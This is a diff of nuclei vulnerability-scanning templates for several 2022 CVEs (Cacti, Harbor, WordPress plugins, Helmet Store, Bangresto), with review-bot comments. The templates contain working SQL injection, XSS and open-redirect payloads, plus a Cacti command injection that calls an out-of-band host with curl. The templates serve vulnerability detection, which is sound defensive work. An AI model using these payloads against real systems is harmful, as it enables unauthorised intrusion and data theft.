+56,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220551f99c4f7c24a72cec95764b5d7e2b82a30fca070b2fdfa2501ea1c7d5a8bfc0220646804689406b49e700190614272ddda500f1ad274e7b8939a2e3589b17f0984:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046a2c0fe907c58a9b3874b212d37ff610222781cef5966b7b7b95dd4e0f16b7902210081f249fa4a02e7e56036f9e4c8e11172e9948b3236b1a137878fd87c08f037dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45805.yaml b/nuclei-templates/CVE-2022/CVE-2022-45805.yaml index 12a8d06bf9..7b9cc20217 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45805.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45805.yaml 
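Review bot: `verified: "true"` stays a quoted string here while this same commit normalises the other touched templates (CVE-2022-45917, CVE-2022-45933, CVE-2022-46381) to the bare boolean `verified: true`; tooling that reads metadata as typed YAML will see a string in this one file. Change the context line to `verified: true` for consistency. The rest of the hunk is metadata additions and a tag reorder, which look fine.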
@@ -6,19 +6,22 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability?_s_id=cve + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45805 cwe-id: CWE-89 - epss-score: 0.00547 - epss-percentile: 0.74842 + epss-score: 0.00486 + epss-percentile: 0.75524 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: paytm product: payment_gateway framework: wordpress - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,paytm-payments,authenticated,paytm http: - raw: 
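Review bot: The added impact text has a typo, "unauthorized accessand data leakage"; it should read `potentially leading to unauthorized access and data leakage.` The EPSS refresh and the added `paytm` tag in the second hunk are otherwise straightforward.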
@@ -48,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4a0a00473045022100ffaacf3f04fe9173625c027fac582b9fe71f6603cfa1e7337c9aed6c6699a316022053594c5922029f30b090ccd3a974802358da4ac9922903ef06fe9008a154bd6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45835.yaml b/nuclei-templates/CVE-2022/CVE-2022-45835.yaml index aa3f9f402a..20b4393803 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45835.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45835.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf @@ -17,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-45835 cwe-id: CWE-918 - epss-score: 0.00404 - epss-percentile: 0.70812 + epss-score: 0.00359 + epss-percentile: 0.71627 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220503fb416a4eec57f83c66b12b0662c6ca82d71e507f383b389018325fbd916fa022100fb0c08a6227aa3c6754a77427dc34ff6e85c46e3cdcae56d7a525178a3ae6728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45917.yaml b/nuclei-templates/CVE-2022/CVE-2022-45917.yaml index 07b78e4a41..3c988bbd4b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45917.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45917.yaml 
@@ -1,35 +1,47 @@ id: CVE-2022-45917 info: - name: ILIAS eLearning platform <= 7.15 - Open Redirect + name: ILIAS eLearning <7.16 - Open Redirect author: arafatansari severity: medium description: | - ILIAS before 7.16 has an Open Redirect + ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability. reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html - https://seclists.org/fulldisclosure/2022/Dec/7 - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ - https://github.com/advisories/GHSA-hf6q-rx44-fh6j + - https://nvd.nist.gov/vuln/detail/CVE-2022-45917 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-45917 cwe-id: CWE-601 + epss-score: 0.00221 + epss-percentile: 0.60222 + cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: ilias + product: ilias shodan-query: http.html:"ILIAS" - verified: "true" - tags: redirect,packetstorm,seclists,cve,cve2022,ilias + tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss -requests: +http: - method: GET path: - - "{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com" - - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com" + - "{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me" + - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me" stop-at-first-match: true matchers: - type: regex part: header regex: - - 
'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' +# digest: 4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45933.yaml b/nuclei-templates/CVE-2022/CVE-2022-45933.yaml index c3a7e4cbb7..8e3f8ca4de 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45933.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45933.yaml 
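Review bot: The rewritten tags line adds `xss` to a template whose name, cwe-id (CWE-601) and matcher all describe an open redirect, so filtering runs by `-tags xss` will include a check that never tests for script injection. Drop it, i.e. `tags: cve,cve2022,redirect,packetstorm,seclists,ilias`. The switch from example.com to oast.me in the two paths is mirrored in the Location regex, and `max-request: 2` matches the two paths with `stop-at-first-match`, so those parts are consistent.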
@@ -6,21 +6,31 @@ info: severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 - https://nvd.nist.gov/vuln/detail/CVE-2022-45933 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 - cwe-id: CWE-287 + cwe-id: CWE-306 + epss-score: 0.00908 + epss-percentile: 0.82406 + cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: kubeview_project + product: kubeview shodan-query: http.title:"KubeView" - verified: "true" - tags: cve,cve2022,kubeview,kubernetes,exposure + tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project -requests: +http: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system" @@ -38,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/03 +# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46020.yaml b/nuclei-templates/CVE-2022/CVE-2022-46020.yaml index f75493d7e4..ef22ee023e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46020.yaml 
+++ b/nuclei-templates/CVE-2022/CVE-2022-46020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.01254 - epss-percentile: 0.84002 + epss-score: 0.02743 + epss-percentile: 0.90317 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true @@ -131,4 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body -# digest: 4b0a00483046022100e8a4e045c4594830eef933527e09b083f52ea6a8b814e634b6875ef734cd783c022100c9b49b68fd0b2d8ecc4f2a0f08f1349a8bfc5b9034dd8542e160334e1e4cb0ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46071.yaml b/nuclei-templates/CVE-2022/CVE-2022-46071.yaml index a7ca50ca6d..b4b8c945ae 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46071.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46071.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46071/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46071 
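Review bot: In the CVE-2022-46071 hunk the new impact text ("extract sensitive information from the database") does not match the description it sits under, which says the login-page injection "can be exploited to bypass admin access", and the template itself checks for an admin page. Align the impact with the description, e.g. `An attacker can bypass authentication to the administrative interface, and may be able to read data from the backing database.` The remediation "Upgrade to the latest version" gives no version; if the references name a fixed release, state it, otherwise say that no fixed version is known.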
@@ -14,28 +18,32 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46071 cwe-id: CWE-89 + epss-score: 0.01454 + epss-percentile: 0.86393 + cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,sql,admin_bypass + max-request: 2 + vendor: helmet_store_showroom_site_project + product: helmet_store_showroom_site + tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project http: - raw: - | - POST /hss/classes/Login.php?f=login HTTP/1.1 + POST /classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username='+OR+1%3D1+--+-&password=1234 - - | - GET /hss/admin/ HTTP/1.1 + GET /admin/ HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "Helmet Store Showroom")' - - 'contains(body_2, "Adminstrator Admin")' + - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and +# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46073.yaml b/nuclei-templates/CVE-2022/CVE-2022-46073.yaml index 340c2afebc..723262ce8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46073.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46073.yaml 
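Review bot: The two raw requests drop the `/hss/` prefix (`POST /classes/Login.php` and `GET /admin/`), while the sibling template CVE-2022-46073 in this same commit keeps `{{BaseURL}}/hss/?q=...`; unless the product is normally deployed at the web root, the two templates now disagree on the application path and one of them will miss real installs. Either keep both forms of the path or note in the template why the prefix was removed. `cookie-reuse: true` is also removed between the login POST and the admin GET; that is fine only if the nuclei release in use reuses cookies by default, otherwise the second request runs without the session and the `status_code_2 == 200` / body check can never match — the same removal appears in CVE-2022-46443 later in this commit.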
@@ -6,23 +6,33 @@ info: severity: medium description: | Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46073/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46073 + - https://www.youtube.com/watch?v=jT09Uiwl0Jo classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46073 cwe-id: CWE-79 + epss-score: 0.00094 + epss-percentile: 0.38558 + cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,xss,helmet-store-showroom + max-request: 1 + vendor: helmet_store_showroom_project + product: helmet_store_showroom + tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project http: - - raw: - - | - GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers: - type: dsl @@ -31,3 +41,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and +# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46169.yaml b/nuclei-templates/CVE-2022/CVE-2022-46169.yaml index 9138c55c53..d3e88d94ac 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46169.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46169.yaml 
@@ -1,34 +1,48 @@ id: CVE-2022-46169 info: - name: Cacti <= 1.2.22 Unauthenticated Command Injection - author: Hardik-Solanki + name: Cacti <=1.2.22 - Remote Command Injection + author: Hardik-Solanki,j4vaovo severity: critical description: | - The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. + Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. + remediation: | + Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. 
reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - https://www.cybersecurity-help.cz/vdb/SB2022121926 + - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 + - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 - cwe-id: CWE-285 + cwe-id: CWE-78,CWE-74 + epss-score: 0.96526 + epss-percentile: 0.9958 + cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: cacti + product: cacti shodan-query: title:"Login to Cacti" - verified: "true" - tags: cve2022,cve,auth-bypass,cacti + tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | - GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1 + GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 unsafe: true + matchers-condition: and matchers: - type: word @@ -43,6 +57,12 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: status status: - 200 +# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46381.yaml b/nuclei-templates/CVE-2022/CVE-2022-46381.yaml index 497ef78338..ee261a0b05 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46381.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46381.yaml 
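Review bot: `cwe-id: CWE-78,CWE-74` lists CWE-74 (the generic injection parent) alongside its child CWE-78; the parent adds no classification value and the other templates in this commit carry a single CWE, so `cwe-id: CWE-78` is enough. The new `useragent` variable plus the `interactsh_request` word matcher in the second hunk tie the callback to this specific request, which is a good false-positive reduction over the previous protocol-only check. The matcher list starts in the first hunk and continues into the second.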
@@ -6,21 +6,33 @@ info: severity: medium description: | Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt - https://nvd.nist.gov/vuln/detail/CVE-2022-46381 + - https://github.com/amitlttwo/CVE-2022-46381 + - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46381 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: niceforyou + product: linear_emerge_e3_access_control_firmware shodan-query: http.html:"Linear eMerge" - tags: cve,cve2022,xss,emerge,linear + tags: cve,cve2022,xss,emerge,linear,niceforyou -requests: +http: - method: GET path: - '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/>' 
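Review bot: The added cpe pins the product to firmware `0.32-07e`, while the description enumerates seven affected versions (0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, 0.32-08e); consumers matching on the CPE will see only one of them as affected. If the advisory covers all listed builds, use the wildcard form, `cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:*:*:*:*:*:*:*:*`, or add the other entries; if NVD genuinely lists only 0.32-07e, a short comment saying so would stop the next reviewer from asking again.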
@@ -36,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46443.yaml b/nuclei-templates/CVE-2022/CVE-2022-46443.yaml index c4514bcab3..0fa198b5eb 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46443.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46443.yaml @@ -6,17 +6,31 @@ info: severity: high description: | Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://yuyudhn.github.io/CVE-2022-46443/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46443 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-46443 cwe-id: CWE-89 + epss-score: 0.05592 + epss-percentile: 0.93095 + cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2022,bangresto,sql + max-request: 2 + vendor: bangresto_project + product: bangresto + tags: cve,cve2022,bangresto,sqli,bangresto_project +variables: + num: "999999999" + http: - raw: - | 
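Review bot: In the CVE-2022-46443 hunk the rewritten tags (`cve,cve2022,bangresto,sqli,bangresto_project`) omit `authenticated`, although the request sequence in the next hunk first logs in with `{{username}}` and `{{password}}` and the cvss vector is PR:L; CVE-2022-45805 in this commit tags the same situation `authenticated`, so add it here too so the template is not run (and reported as a miss) in unauthenticated scans. The remediation "Upgrade to the latest version" names no fixed release; state one if the references give it. The untouched description line still reads "vulnberable" and could be corrected while the info block is being rewritten.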
@@ -25,19 +39,16 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}} - - | POST /bangresto-main/staff/insertorder.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; - itemID[]=1&itemqty[]=(SELECT CONCAT(CONCAT(0x716a7a6b71,(CASE WHEN (1964=1964) THEN 0x31 ELSE 0x30 END)),0x7178717a71))&sentorder=Sent to kitchen + itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen - cookie-reuse: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code == 302' - - 'contains(body, "inserted")' - - 'contains(body, "updated")' - condition: and + - type: word + words: + - '{{md5({{num}})}}' +# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46463.yaml b/nuclei-templates/CVE-2022/CVE-2022-46463.yaml index bb6a3ffcc9..142020dcbe 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46463.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor. remediation: | Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability. reference: 
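Review bot: The new word matcher for `{{md5({{num}})}}` carries no `part:`, so it depends on the engine default for where the marker is searched; since the marker is expected in the response body, `part: body` states that explicitly and keeps the template readable alongside the other matchers in this commit that name their part. `matchers-condition: and` now governs a single matcher and can be dropped. The removal of the status/`inserted`/`updated` DSL check means a 302 with no marker is no longer a hit, which is the intended tightening. The enclosing raw block (the login request) starts outside the hunk.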
@@ -13,13 +15,14 @@ info: - https://github.com/Vad1mo - https://github.com/lanqingaa/123/blob/main/README.md - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d + - https://github.com/lanqingaa/123 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-46463 cwe-id: CWE-306 - epss-score: 0.01786 - epss-percentile: 0.86525 + epss-score: 0.01473 + epss-percentile: 0.86471 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,22 +30,23 @@ info: vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 - tags: cve,cve2022,harbor,auth-bypass,exposure + tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation http: - method: GET path: - "{{BaseURL}}/api/v2.0/search?q=/" - - "{{BaseURL}}/api/v2.0/users/current" matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_1, "repository_name")' - - 'contains(body_1, "project_name")' + - type: word + part: body + words: + - "repository_name" + - "project_name" condition: and - - type: dsl - dsl: - - '!contains(body_2, "UNAUTHORIZED")' + - type: status + status: + - 200 +# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46888.yaml b/nuclei-templates/CVE-2022/CVE-2022-46888.yaml index 8a8861fbf4..397e6d5a06 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46888.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46888.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.37731 + epss-score: 0.00099 + epss-percentile: 0.40602 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true 
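Review bot: The second hunk drops the `/api/v2.0/users/current` request and its `!contains(body_2, "UNAUTHORIZED")` check, leaving only "search returns `repository_name`/`project_name` with HTTP 200" as the match; if the Harbor search API legitimately lists public projects to anonymous callers, patched instances that merely have public repositories will now be reported, so the unauthenticated-access proof has been weakened rather than simplified. Consider keeping a negative check against an endpoint that should reject anonymous callers, or restricting the word match to a field that only appears for private repositories. `max-request` in the metadata (outside the hunk) should also be reduced to 1 if the second request stays removed.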
